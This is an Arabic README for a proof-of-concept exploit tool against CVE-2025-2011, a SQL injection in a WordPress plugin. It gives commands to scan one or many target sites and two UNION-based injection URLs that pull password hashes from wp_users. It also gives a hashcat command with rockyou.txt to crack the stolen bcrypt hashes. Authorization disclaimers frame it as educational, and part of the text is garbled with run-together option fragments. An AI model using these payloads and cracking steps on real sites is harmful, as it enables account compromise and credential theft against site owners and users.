
استغلال لـ CVE-2025-2011
بواسطة: X3RX3S ولكن تم تمزيقه بفخر بواسطة Ash Wesker الذي استخدم GPT على كودي مع لافتته ;) انظر هنا ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 يمكنك حتى رؤية اسمي في 'كوده' -_-'
الغرض: أداة إثبات مفهوم لاختبار ثغرة حقن SQL (CVE-2025-2011) ضد مواقع WordPress.
إخلاء مسؤولية: استخدم فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الاختبار غير المصرح به غير قانوني وغير أخلاقي.

-p 1 أو -p 2)$2a$, $2b$, $2y$) بما في ذلك المتغيرات المسبوقة بـ $wp$results_<hostname>.txt-m 3200) مع مطالبة-u) أو أهداف متعددة عبر ملف (-f)requestscoloramaتثبيت التبعيات:
pip install requests colorama
اختياري (للتجزيء):
hashcat مثبت ومتاح في PATH (الافتراضي هو /usr/share/wordlists/rockyou.txt)/usr/share/wordlists/rockyou.txtجعل السكربت قابل للتنفيذ (اختياري):
chmod +x CVE-2025-2011.py
هدف واحد (الحمولة الافتراضية 1):
python3 CVE-2025-2011.py -u https://example.com
هدف واحد (الحمولة 2):
python3 CVE-2025-2011.py -u https://example.com -p 2
أهداف متعددة من ملف (عنوان URL واحد في كل سطر):
python3 CVE-2025-2011.py -f targets.txt
لكل مضيف تم اختباره، يحفظ السكربت ملف نتيجة:
results_<hostname>.txt
إذا تم العثور على تجزئات bcrypt، يتم حفظها في hashes.txt وسيُطلب منك تجزيئها باستخدام Hashcat. مثال لأمر Hashcat المستخدم من قبل السكربت:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
ملاحظة: bcrypt بطيء بطبيعته. قد يستغرق التجزيء وقتاً طويلاً جداً ويتطلب وحدات معالجة رسومية (GPUs).
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x
هذه الأداة مقدمة لأغراض تعليمية ودفاعية فقط. لا تستخدمها ضد أنظمة ليس لديك إذن صريح بها. المؤلف والموزع لا يتحملان أي مسؤولية عن سوء الاستخدام. احصل دائماً على إذن كتابي قبل تشغيل الاختبارات ضد أهداف لا تملكها.
run_hashcat في السكربت للإشارة إلى قائمتك المفضلة.